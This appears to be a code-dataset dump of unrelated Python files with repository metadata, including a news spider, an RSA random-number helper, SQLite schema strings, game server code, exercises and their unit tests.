out = torch.cat([l,r,f],1)
out = self.conv(out)
# out = self.bn(out)
return out
|
[
"lwj19970331@gmail.com"
] |
lwj19970331@gmail.com
|
9fbb8d857ef7cc14b89be917d6cb223e5b2d5dc8
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/5FoNY2Z7B5wSCDTA4_0.py
|
fc139177107dd49dad4a420b77ec06ab6021e1c7
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 484
|
py
|
"""
**Mubashir** needs your help to find out next happy year.
A **Happy Year** is the year with only _distinct digits_. Create a function
that takes an integer `year` and returns the **next happy year**.
### Examples
happy_year(2017) ➞ 2018
# 2018 has all distinct digits
happy_year(1990) ➞ 2013
happy_year(2021) ➞ 2031
### Notes
N/A
"""
def happy_year(year):
year += 1
while len(set(str(year))) != 4:year += 1
return year
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
6bfec8c1fcbb786162593abf6d669f571b7c851e
|
275a96a33ae1f89e7b2ee0ecdbac7d78abe6d6cc
|
/test/test_user_with_balance_result.py
|
72c8b77ba889ac3b0da96b18a24fc46de2b8a7de
|
[] |
no_license
|
cascadiarc/cyclos-python-client
|
8029ce07174f2fe92350a92dda9a60976b2bb6c2
|
a2e22a30e22944587293d51be2b8268bce808d70
|
refs/heads/main
| 2023-04-03T16:52:01.618444
| 2021-04-04T00:00:52
| 2021-04-04T00:00:52
| 354,419,532
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 929
|
py
|
# coding: utf-8
"""
Cyclos 4.11.5 API
The REST API for Cyclos 4.11.5 # noqa: E501
OpenAPI spec version: 4.11.5
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.user_with_balance_result import UserWithBalanceResult # noqa: E501
from swagger_client.rest import ApiException
class TestUserWithBalanceResult(unittest.TestCase):
"""UserWithBalanceResult unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testUserWithBalanceResult(self):
"""Test UserWithBalanceResult"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.user_with_balance_result.UserWithBalanceResult() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"dan@leftcoastfs.com"
] |
dan@leftcoastfs.com
|
6ac2e4e4004008a5b2623b6c78287deb51703b8f
|
bbeba16730eca05a897e46e771b8e9dc2a61e044
|
/testflows/_core/contrib/rsa/randnum.py
|
aad03fac065e68575ca88525fb786438bdd31ccc
|
[
"Apache-2.0"
] |
permissive
|
testflows/TestFlows-Core
|
47d3e5b8890fcf73024c91f4ea293363c29f422b
|
7dd2d3af19f6930257bd53133286edb78bf490ab
|
refs/heads/master
| 2023-08-16T15:42:08.888323
| 2023-08-15T11:35:09
| 2023-08-15T11:35:09
| 215,418,320
| 5
| 4
|
NOASSERTION
| 2023-04-26T19:28:55
| 2019-10-15T23:59:26
|
Python
|
UTF-8
|
Python
| false
| false
| 2,695
|
py
|
# Copyright 2011 Sybren A. Stüvel <sybren@stuvel.eu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions for generating random numbers."""
# Source inspired by code by Yesudeep Mangalapilly <yesudeep@gmail.com>
import os
import struct
from .common import bit_size as get_bit_size
from .transform import bytes2int
def read_random_bits(nbits: int) -> bytes:
"""Reads 'nbits' random bits.
If nbits isn't a whole number of bytes, an extra byte will be appended with
only the lower bits set.
"""
nbytes, rbits = divmod(nbits, 8)
# Get the random bytes
randomdata = os.urandom(nbytes)
# Add the remaining random bits
if rbits > 0:
randomvalue = ord(os.urandom(1))
randomvalue >>= (8 - rbits)
randomdata = struct.pack("B", randomvalue) + randomdata
return randomdata
def read_random_int(nbits: int) -> int:
"""Reads a random integer of approximately nbits bits.
"""
randomdata = read_random_bits(nbits)
value = bytes2int(randomdata)
# Ensure that the number is large enough to just fill out the required
# number of bits.
value |= 1 << (nbits - 1)
return value
def read_random_odd_int(nbits: int) -> int:
"""Reads a random odd integer of approximately nbits bits.
>>> read_random_odd_int(512) & 1
1
"""
value = read_random_int(nbits)
# Make sure it's odd
return value | 1
def randint(maxvalue: int) -> int:
"""Returns a random integer x with 1 <= x <= maxvalue
May take a very long time in specific situations. If maxvalue needs N bits
to store, the closer maxvalue is to (2 ** N) - 1, the faster this function
is.
"""
bit_size = get_bit_size(maxvalue)
tries = 0
while True:
value = read_random_int(bit_size)
if value <= maxvalue:
break
if tries % 10 == 0 and tries:
# After a lot of tries to get the right number of bits but still
# smaller than maxvalue, decrease the number of bits by 1. That'll
# dramatically increase the chances to get a large enough number.
bit_size -= 1
tries += 1
return value
|
[
"vzakaznikov@protonmail.com"
] |
vzakaznikov@protonmail.com
|
32efb664104158f736b734dd02cffd81d7c62d5f
|
8cfdba6dd2804e2c3e3faed0c47640f347b14414
|
/utils/util.py
|
4bca3bba741b252dee48d19f96f64b8b9842e9ac
|
[] |
no_license
|
DiegoDigo/tochegando
|
07c4368842897d80df57545a93bf182203724b04
|
36ac3b7109a60a4998b283c54d85d80b8c8e535e
|
refs/heads/master
| 2023-05-28T08:49:43.564907
| 2017-11-27T19:28:06
| 2017-11-27T19:28:06
| 108,421,683
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 242
|
py
|
from datetime import datetime
def verificar_idade(datanasc:datetime):
if datanasc.month == datetime.today().month:
return datetime.today().year - datanasc.year
else:
return (datetime.today().year - datanasc.year) - 1
|
[
"di3g0d0ming05@gmail.com"
] |
di3g0d0ming05@gmail.com
|
a9b5c37d490d72e9375bcbdc7923a7dac1af0d0c
|
01ac9e40052a468dd472a296df0003c4e629e2c9
|
/news_all/spiders_old/tsw_all.py
|
c97cd4d9b74d039fbc585c3c4ee884ec2f287e8e
|
[] |
no_license
|
Pintrue/news_all
|
b5cee16584ed92e6574edd825b574214df65d917
|
eb8c32c79bdacd8e2f76b88f27871c3cd0118006
|
refs/heads/master
| 2022-03-23T13:34:10.354029
| 2019-11-22T07:40:50
| 2019-11-22T07:40:50
| 223,058,997
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,710
|
py
|
# -*- coding: utf-8 -*-
from datetime import datetime
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import Rule
from news_all.spider_models import NewsRCSpider
import re
class TswSpider(NewsRCSpider):
"""天山网"""
name = 'tsw'
mystart_urls = {
'http://news.ts.cn/tp/index.shtml': 1301253, # 天山网 新闻中心-图片新闻-左侧列表
}
rules = (
#http://news.ts.cn/system/2019/06/03/035719250.shtml
Rule(LinkExtractor(allow=(r'news.ts.cn.*?/%s/\d{2}/\d+.shtml' % datetime.today().strftime('%Y/%m'), ),
), callback='parse_item',
follow=False),
)
def parse_item(self, response):
xp = response.xpath
try:
title = xp("//h1[@class='active-title']/text()").extract_first()
source = xp("//p[@class='active-info2']")[0]
content_div = xp("//div[@class='hy-active']")[0]
pubtime = source.re(r'\d{2,4}年\d{1,2}月\d{1,2}日')[0]
# pubtime = xp("//div[@class='Remark']/span/text()").extract_first().split('|')[0]
origin_name_div =xp('//p[@class="active-info2"]/text()').extract_first('')
origin_name = re.findall(".*来源:(.*).*", origin_name_div)[0]
except:
return self.produce_debugitem(response, "xpath error")
content, media, _, _ = self.content_clean(content_div)
return self.produce_item(
response=response,
title=title,
# self.get_page_title(response).split('_')[0]
pubtime=pubtime,
origin_name=origin_name,
content=content,
media=media
)
|
[
"py416@ic.ac.uk"
] |
py416@ic.ac.uk
|
70797a92621d0c27c582ee280246e49b977d773d
|
8f5c1ad76f3f9aa67d6720154b4884c9fab2ecbc
|
/toontown/hood/DGHoodAI.py
|
e4f84d08dd39839a3336652b6e2f10b55714760e
|
[] |
no_license
|
RegDogg/ttr-2014-dev
|
eb0d9da3e91b9504b83804c27e1a00d87a0b7220
|
8a392ea4697cf15bd83accd01dcf26d0f87557eb
|
refs/heads/master
| 2023-07-13T02:40:56.171517
| 2021-07-12T00:31:28
| 2021-07-12T00:31:28
| 372,103,145
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,132
|
py
|
from toontown.toonbase import ToontownGlobals
from toontown.safezone.DistributedDGFlowerAI import DistributedDGFlowerAI
from SZHoodAI import SZHoodAI
from toontown.toon import NPCToons
from toontown.safezone import ButterflyGlobals
from toontown.safezone.DistributedButterflyAI import DistributedButterflyAI
class DGHoodAI(SZHoodAI):
HOOD = ToontownGlobals.DaisyGardens
def createZone(self):
SZHoodAI.createZone(self)
self.butterflies = []
self.spawnObjects()
self.flower = DistributedDGFlowerAI(self.air)
self.flower.generateWithRequired(self.HOOD)
self.createButterflies()
def createButterflies(self):
playground = ButterflyGlobals.DG
for area in range(ButterflyGlobals.NUM_BUTTERFLY_AREAS[playground]):
for b in range(ButterflyGlobals.NUM_BUTTERFLIES[playground]):
butterfly = DistributedButterflyAI(self.air)
butterfly.setArea(playground, area)
butterfly.setState(0, 0, 0, 1, 1)
butterfly.generateWithRequired(self.HOOD)
self.butterflies.append(butterfly)
|
[
"regdogg.acr@gmail.com"
] |
regdogg.acr@gmail.com
|
af25fa5ee55d2f7965a59473f1165b20d44c87ed
|
9c4f3a2d6d95f2f9a96d4a33f258c9dbbd73bbb3
|
/raiden/storage/utils.py
|
0ef042bd43e5384ae288246965fb7494900f8dcb
|
[
"MIT"
] |
permissive
|
copra2005/raiden
|
b70d4a9c20fca19bc984aa7546da3b54ff22eea7
|
2afd6a0039107bb9bbe1d619b9ebfedc1373b566
|
refs/heads/master
| 2020-03-28T05:11:21.533314
| 2018-09-06T14:12:51
| 2018-09-06T20:53:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 989
|
py
|
DB_CREATE_SETTINGS = '''
CREATE TABLE IF NOT EXISTS settings (
name VARCHAR[24] NOT NULL PRIMARY KEY,
value TEXT
);
'''
DB_CREATE_STATE_CHANGES = '''
CREATE TABLE IF NOT EXISTS state_changes (
identifier INTEGER PRIMARY KEY AUTOINCREMENT,
data BINARY
);
'''
DB_CREATE_SNAPSHOT = '''
CREATE TABLE IF NOT EXISTS state_snapshot (
identifier INTEGER PRIMARY KEY,
statechange_id INTEGER,
data BINARY,
FOREIGN KEY(statechange_id) REFERENCES state_changes(identifier)
);
'''
DB_CREATE_STATE_EVENTS = '''
CREATE TABLE IF NOT EXISTS state_events (
identifier INTEGER PRIMARY KEY,
source_statechange_id INTEGER NOT NULL,
data BINARY,
FOREIGN KEY(source_statechange_id) REFERENCES state_changes(identifier)
);
'''
DB_SCRIPT_CREATE_TABLES = """
PRAGMA foreign_keys=off;
BEGIN TRANSACTION;
{}{}{}{}
COMMIT;
PRAGMA foreign_keys=on;
""".format(
DB_CREATE_SETTINGS,
DB_CREATE_STATE_CHANGES,
DB_CREATE_SNAPSHOT,
DB_CREATE_STATE_EVENTS,
)
|
[
"lefteris@refu.co"
] |
lefteris@refu.co
|
ec41eba4d760cb80e779607fef62ddb85cf78059
|
e7b7505c084e2c2608cbda472bc193d4a0153248
|
/LeetcodeNew/Tree/LC_124_Binary_Tree_Maximum_Path_Sum.py
|
6a10be30d8460e31e6ec0ca49ac7de282569f3cf
|
[] |
no_license
|
Taoge123/OptimizedLeetcode
|
8e5c1cd07904dfce1248bc3e3f960d2f48057a5d
|
3e50f6a936b98ad75c47d7c1719e69163c648235
|
refs/heads/master
| 2023-02-27T21:13:40.450089
| 2023-02-07T04:11:09
| 2023-02-07T04:11:09
| 170,044,224
| 9
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,707
|
py
|
"""
Given a non-empty binary tree, find the maximum path sum.
For this problem, a path is defined as any sequence of nodes from some starting node to any node in the tree along the parent-child connections. The path must contain at least one node and does not need to go through the root.
Example 1:
Input: [1,2,3]
1
/ \
2 3
Output: 6
Example 2:
Input: [-10,9,20,null,null,15,7]
-10
/ \
9 20
/ \
15 7
Output: 42
Similar to Problem 687
https://leetcode.com/problems/binary-tree-maximum-path-sum/discuss/171807/Python-or-DFS-tm
Algorithm
分制到底部,在返回的时候传入左右任意一遍最大值加上目前root.val:
cur = max(left, right) + root.val
这种情况处理了从Root到左右任意一边的最大值,也就是 root.val + left 和 root.val + right
还有一种情况就是当最大值 = root.val + left + right, 我们在放入global变量的时候何其比较。
对于最底部叶子节点传上来的值,我们将其设置成0: return cur if cur > 0 else 0
Now everything is ready to write down an algorithm.
1. Initiate max_sum as the smallest possible integer and call max_gain(node = root).
2. Implement max_gain(node) with a check to continue the old path/to start a new path:
- Base case : if node is null, the max gain is 0.
- Call max_gain recursively for the node children to compute max gain from the left and right subtrees : left_gain = max(max_gain(node.left), 0) and
right_gain = max(max_gain(node.right), 0).
- Now check to continue the old path or to start a new path. To start a new path would cost price_newpath = node.val + left_gain + right_gain. Update max_sum if it's better to start a new path.
- For the recursion return the max gain the node and one/zero of its subtrees could add to the current path : node.val + max(left_gain, right_gain).
Bottom up divider and conquer
At each rode, it can form 3 tyes of path.
1st is node
2nd is left - node - right
3rd is left/right - node
Once we get the max after comparsion, we return 1st or 3rd path sum to the upper level.
"""
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def maxPathSum(self, root: TreeNode) -> int:
if not root:
return
self.res = float('-inf')
self.helper(root)
return self.res
def helper(self, root):
if not root:
return 0
left = max(self.helper(root.left), 0)
right = max(self.helper(root.right), 0)
self.res = max(self.res, root.val + left + right)
return max(left, right) + root.val
|
[
"taocheng984@gmail.com"
] |
taocheng984@gmail.com
|
010427dfae0fe07018165b13f4ff05de9eb8ea7c
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/galex_j19059-4438/sdB_galex_j19059-4438_coadd.py
|
21693045bdacdeb4c6ec6e927c32a01761f2fbab
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 455
|
py
|
from gPhoton.gMap import gMap
def main():
gMap(band="NUV", skypos=[286.482375,-44.643983], skyrange=[0.0333333333333,0.0333333333333], stepsz = 30., cntfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdBs/sdB_galex_j19059-4438/sdB_galex_j19059-4438_movie_count.fits", cntcoaddfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdB/sdB_galex_j19059-4438/sdB_galex_j19059-4438_count_coadd.fits", overwrite=True, verbose=3)
if __name__ == "__main__":
main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
2dd11b0a111f15630d14d50fd54317a69dd5160c
|
99c4d4a6592fded0e8e59652484ab226ac0bd38c
|
/code/batch-1/dn5/M-69.py
|
5f487e7ea6ba72a5ea5819aa9b5f57e667ecd5d4
|
[] |
no_license
|
benquick123/code-profiling
|
23e9aa5aecb91753e2f1fecdc3f6d62049a990d5
|
0d496d649247776d121683d10019ec2a7cba574c
|
refs/heads/master
| 2021-10-08T02:53:50.107036
| 2018-12-06T22:56:38
| 2018-12-06T22:56:38
| 126,011,752
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,698
|
py
|
import unittest
def unikati(s):
seznam_unik = []
for currUnik in s:
if(not seznam_unik.__contains__(currUnik)):
seznam_unik.append(currUnik)
return seznam_unik
def avtor(tvit):
ime = ""
for currChar in tvit:
if currChar != ':':
ime += currChar
else:
break
return ime
def vsi_avtorji(tviti):
avtorji = []
for tvit in tviti:
avtorji.append(avtor(tvit))
return unikati(avtorji)
def izloci_besedo(beseda):
for currChar in beseda:
if not currChar.isalnum():
beseda = beseda[1:]
else:
break
for currChar in reversed(beseda):
if not currChar.isalnum():
beseda = beseda[:-1]
else:
break
return beseda
def se_zacne_z(tvit, c):
besede = []
for currBeseda in tvit.split():
if(currBeseda[0] == c):
besede.append(izloci_besedo(currBeseda))
return besede
def zberi_se_zacne_z(tviti, c):
besede = []
for tvit in tviti:
besede.extend(se_zacne_z(tvit, c))
return unikati(besede)
def vse_afne(tviti):
return zberi_se_zacne_z(tviti, '@')
def vsi_hashtagi(tviti):
return zberi_se_zacne_z(tviti, '#')
def vse_osebe(tviti):
osebe = []
for tvit in tviti:
osebe.append(avtor(tvit))
osebe.extend(vse_afne(tviti))
osebe.sort()
return unikati(osebe)
def custva(tviti, hashtagi):
osebe = []
for tvit in tviti:
for hashtag in hashtagi:
if tvit.__contains__(hashtag):
osebe.append(avtor(tvit))
osebe.sort()
return unikati(osebe)
def se_poznata(tviti, oseba1, oseba2):
for tvit in tviti:
if (se_zacne_z(tvit, '@').__contains__(oseba1) and avtor(tvit) == oseba2) or (se_zacne_z(tvit, '@').__contains__(oseba2) and avtor(tvit) == oseba1):
return True
return False
class TestTviti(unittest.TestCase):
tviti = [
"sandra: Spet ta dež. #dougcajt",
"berta: @sandra Delaj domačo za #programiranje1",
"sandra: @berta Ne maram #programiranje1 #krneki",
"ana: kdo so te @berta, @cilka, @dani? #krneki",
"cilka: jst sm pa #luft",
"benjamin: pogrešam ano #zalosten",
"ema: @benjamin @ana #split? po dvopičju, za začetek?",
]
def test_unikat(self):
self.assertEqual(unikati([1, 2, 1, 1, 3, 2]), [1, 2, 3])
self.assertEqual(unikati([1, 3, 2, 1, 1, 3, 2]), [1, 3, 2])
self.assertEqual(unikati([1, 5, 4, 3, 2]), [1, 5, 4, 3, 2])
self.assertEqual(unikati([1, 1, 1, 1, 1]), [1])
self.assertEqual(unikati([1]), [1])
self.assertEqual(unikati([]), [])
self.assertEqual(unikati(["Ana", "Berta", "Cilka", "Berta"]), ["Ana", "Berta", "Cilka"])
def test_avtor(self):
self.assertEqual(avtor("janez: pred dvopičjem avtor, potem besedilo"), "janez")
self.assertEqual(avtor("ana: malo krajse ime"), "ana")
self.assertEqual(avtor("benjamin: pomembne so tri stvari: prva, druga in tretja"), "benjamin")
def test_vsi_avtorji(self):
self.assertEqual(vsi_avtorji(self.tviti), ["sandra", "berta", "ana", "cilka", "benjamin", "ema"])
self.assertEqual(vsi_avtorji(self.tviti[:3]), ["sandra", "berta"])
def test_izloci_besedo(self):
self.assertEqual(izloci_besedo("@ana"), "ana")
self.assertEqual(izloci_besedo("@@ana!!!"), "ana")
self.assertEqual(izloci_besedo("ana"), "ana")
self.assertEqual(izloci_besedo("!#$%\"=%/%()/Ben-jamin'"), "Ben-jamin")
def test_vse_na_crko(self):
self.assertEqual(se_zacne_z("Benjamin $je $skocil! Visoko!", "$"), ["je", "skocil"])
self.assertEqual(se_zacne_z("Benjamin $je $skocil! #Visoko!", "$"), ["je", "skocil"])
self.assertEqual(se_zacne_z("ana: kdo so te @berta, @cilka, @dani? #krneki", "@"), ["berta", "cilka", "dani"])
def test_zberi_na_crko(self):
self.assertEqual(zberi_se_zacne_z(self.tviti, "@"), ['sandra', 'berta', 'cilka', 'dani', 'benjamin', 'ana'])
self.assertEqual(zberi_se_zacne_z(self.tviti, "#"), ['dougcajt', 'programiranje1', 'krneki', 'luft', 'zalosten', 'split'])
def test_vse_afne(self):
self.assertEqual(vse_afne(self.tviti), ['sandra', 'berta', 'cilka', 'dani', 'benjamin', 'ana'])
def test_vsi_hashtagi(self):
self.assertEqual(vsi_hashtagi(self.tviti), ['dougcajt', 'programiranje1', 'krneki', 'luft', 'zalosten', 'split'])
def test_vse_osebe(self):
self.assertEqual(vse_osebe(self.tviti), ['ana', 'benjamin', 'berta', 'cilka', 'dani', 'ema', 'sandra'])
class TestDodatna(unittest.TestCase):
tviti = [
"sandra: Spet ta dež. #dougcajt",
"berta: @sandra Delaj domačo za #programiranje1",
"sandra: @berta Ne maram #programiranje1 #krneki",
"ana: kdo so te @berta, @cilka, @dani? #krneki",
"cilka: jst sm pa #luft",
"benjamin: pogrešam ano #zalosten",
"ema: @benjamin @ana #split? po dvopičju, za začetek?",
]
def test_custva(self):
self.assertEqual(custva(self.tviti, ["dougcajt", "krneki"]), ["ana", "sandra"])
self.assertEqual(custva(self.tviti, ["luft"]), ["cilka"])
self.assertEqual(custva(self.tviti, ["meh"]), [])
def test_se_poznata(self):
self.assertTrue(se_poznata(self.tviti, "ana", "berta"))
self.assertTrue(se_poznata(self.tviti, "ema", "ana"))
self.assertFalse(se_poznata(self.tviti, "sandra", "ana"))
self.assertFalse(se_poznata(self.tviti, "cilka", "luft"))
self.assertFalse(se_poznata(self.tviti, "cilka", "balon"))
if __name__ == "__main__":
unittest.main()
|
[
"benjamin.fele@gmail.com"
] |
benjamin.fele@gmail.com
|
5180350f76117971d49278960829f3e352d29cdc
|
79c2fe6cc0af8c9267901d891b85e226d4b6bc51
|
/pontoon/base/tests/test_models.py
|
4fc934d4f2c75d624a3863fa9c7ab422901d7b78
|
[
"BSD-3-Clause"
] |
permissive
|
SandraShklyaeva/pontoon
|
d1f1eab458bbab75e54b112e60d077d34b27699f
|
577a3275a0cf4888ecc30622ba4449fe706d5fd6
|
refs/heads/master
| 2021-01-14T12:36:21.461908
| 2015-09-16T08:33:11
| 2015-09-16T08:33:11
| 31,669,331
| 0
| 0
| null | 2015-03-26T06:12:32
| 2015-03-04T17:14:22
|
Python
|
UTF-8
|
Python
| false
| false
| 1,916
|
py
|
from django_nose.tools import assert_equal
from pontoon.base.models import Translation
from pontoon.base.tests import (
TranslationFactory,
UserFactory,
TestCase
)
from pontoon.base.utils import aware_datetime
class TranslationQuerySetTests(TestCase):
def setUp(self):
self.user0, self.user1 = UserFactory.create_batch(2)
def _translation(self, user, submitted, approved):
return TranslationFactory.create(
date=aware_datetime(*submitted),
user=user,
approved_date=aware_datetime(*approved) if approved else None,
approved_user=user
)
def test_latest_activity_translated(self):
"""
If latest activity in Translation QuerySet is translation submission,
return submission date and user.
"""
latest_submission = self._translation(self.user0, submitted=(1970, 1, 3), approved=None)
latest_approval = self._translation(self.user1, submitted=(1970, 1, 1), approved=(1970, 1, 2))
assert_equal(Translation.objects.all().latest_activity(), {
'date': latest_submission.date,
'user': latest_submission.user
})
def test_latest_activity_approved(self):
"""
If latest activity in Translation QuerySet is translation approval,
return approval date and user.
"""
latest_submission = self._translation(self.user0, submitted=(1970, 1, 2), approved=(1970, 1, 2))
latest_approval = self._translation(self.user1, submitted=(1970, 1, 1), approved=(1970, 1, 3))
assert_equal(Translation.objects.all().latest_activity(), {
'date': latest_approval.date,
'user': latest_approval.user
})
def test_latest_activity_none(self):
"""If empty Translation QuerySet, return None."""
assert_equal(Translation.objects.none().latest_activity(), None)
|
[
"matjaz.horvat@gmail.com"
] |
matjaz.horvat@gmail.com
|
375a11d1c77c7c9b5e0a4ecfe2d2dece4756c57a
|
9878df8dcc9443267197e31f24a628e115c87949
|
/swagger_client/models/create_org_option.py
|
fa8e956d06cf5b747f1f317a21355174bd33dc79
|
[] |
no_license
|
mirandacong/gitea_python_client
|
79fff8b3bb73f160abb059fe2f470b185017e844
|
79e2ae5253a20635aa019e176c17f8797d418f01
|
refs/heads/master
| 2020-04-02T00:19:07.392521
| 2018-10-20T05:02:55
| 2018-10-20T05:02:55
| 153,798,708
| 0
| 0
| null | 2018-10-20T05:02:56
| 2018-10-19T14:49:15
|
Python
|
UTF-8
|
Python
| false
| false
| 5,763
|
py
|
# coding: utf-8
"""
Gitea API.
This documentation describes the Gitea API. # noqa: E501
OpenAPI spec version: 1.1.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class CreateOrgOption(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'description': 'str',
'full_name': 'str',
'location': 'str',
'username': 'str',
'website': 'str'
}
attribute_map = {
'description': 'description',
'full_name': 'full_name',
'location': 'location',
'username': 'username',
'website': 'website'
}
def __init__(self, description=None, full_name=None, location=None, username=None, website=None): # noqa: E501
"""CreateOrgOption - a model defined in Swagger""" # noqa: E501
self._description = None
self._full_name = None
self._location = None
self._username = None
self._website = None
self.discriminator = None
if description is not None:
self.description = description
if full_name is not None:
self.full_name = full_name
if location is not None:
self.location = location
self.username = username
if website is not None:
self.website = website
@property
def description(self):
"""Gets the description of this CreateOrgOption. # noqa: E501
:return: The description of this CreateOrgOption. # noqa: E501
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this CreateOrgOption.
:param description: The description of this CreateOrgOption. # noqa: E501
:type: str
"""
self._description = description
@property
def full_name(self):
"""Gets the full_name of this CreateOrgOption. # noqa: E501
:return: The full_name of this CreateOrgOption. # noqa: E501
:rtype: str
"""
return self._full_name
@full_name.setter
def full_name(self, full_name):
"""Sets the full_name of this CreateOrgOption.
:param full_name: The full_name of this CreateOrgOption. # noqa: E501
:type: str
"""
self._full_name = full_name
@property
def location(self):
"""Gets the location of this CreateOrgOption. # noqa: E501
:return: The location of this CreateOrgOption. # noqa: E501
:rtype: str
"""
return self._location
@location.setter
def location(self, location):
"""Sets the location of this CreateOrgOption.
:param location: The location of this CreateOrgOption. # noqa: E501
:type: str
"""
self._location = location
@property
def username(self):
"""Gets the username of this CreateOrgOption. # noqa: E501
:return: The username of this CreateOrgOption. # noqa: E501
:rtype: str
"""
return self._username
@username.setter
def username(self, username):
"""Sets the username of this CreateOrgOption.
:param username: The username of this CreateOrgOption. # noqa: E501
:type: str
"""
if username is None:
raise ValueError("Invalid value for `username`, must not be `None`") # noqa: E501
self._username = username
@property
def website(self):
"""Gets the website of this CreateOrgOption. # noqa: E501
:return: The website of this CreateOrgOption. # noqa: E501
:rtype: str
"""
return self._website
@website.setter
def website(self, website):
"""Sets the website of this CreateOrgOption.
:param website: The website of this CreateOrgOption. # noqa: E501
:type: str
"""
self._website = website
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CreateOrgOption):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"qzmfranklin@gmail.com"
] |
qzmfranklin@gmail.com
|
0c543552664fd3afe39399fb3f895ca72021e56d
|
bc6508a1dde1e61a8b2f61e70044c074aeeb4406
|
/whoiser/servers/BB.py
|
b33a96c32341105b898e149e693478ed66fbf271
|
[] |
no_license
|
krikulis/whoiser
|
7eca72260dc061a91c7630901557264b80c5263e
|
27af46d6ffcf2bacc5e5b837883ab5fab7ac9b40
|
refs/heads/master
| 2021-01-10T19:10:53.915622
| 2012-06-24T23:50:28
| 2012-06-24T23:50:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 187
|
py
|
from servers.generic import GenericWhoisQuery
class WhoisQuery(GenericWhoisQuery):
def query(self, query):
raise NotImplementedError(u"TLD BB has no Whois server available")
|
[
"kristaps.kulis@gmail.com"
] |
kristaps.kulis@gmail.com
|
2b102cafd639c68ae78c3d889a58a70e39bcd682
|
285de86d006f3ef53b94156d7fcbddb498f10a60
|
/backend/users/migrations/0002_auto_20201125_0526.py
|
d21f4d5402f99799cba6e502d6e82dd81cb1bcc6
|
[] |
no_license
|
crowdbotics-apps/aia-store-22965
|
1e457444cd854adfb35e59edff4ab1f06b8c13b7
|
28162af82dc569d4f4e9a12a14d41787cb1f1a72
|
refs/heads/master
| 2023-01-19T09:18:50.195872
| 2020-11-25T05:27:32
| 2020-11-25T05:27:32
| 315,837,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 627
|
py
|
# Generated by Django 2.2.17 on 2020-11-25 05:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('course', '0001_initial'),
('users', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='user',
name='group',
field=models.ManyToManyField(blank=True, related_name='user_group', to='course.Group'),
),
migrations.AlterField(
model_name='user',
name='name',
field=models.CharField(blank=True, max_length=255, null=True),
),
]
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
3c90e8613ee6cecb065601ac20d4e343478c900d
|
b6aa9768dbac327943e0220df1c56ce38adc6de1
|
/657_robot-return-to-origin.py
|
56b67347d37bd1865161ddde5c165b4adcf916f8
|
[] |
no_license
|
Khrystynka/LeetCodeProblems
|
f86e4c1e46f70f874924de137ec5efb2f2518766
|
917bd000c2a055dfa2633440a61ca4ae2b665fe3
|
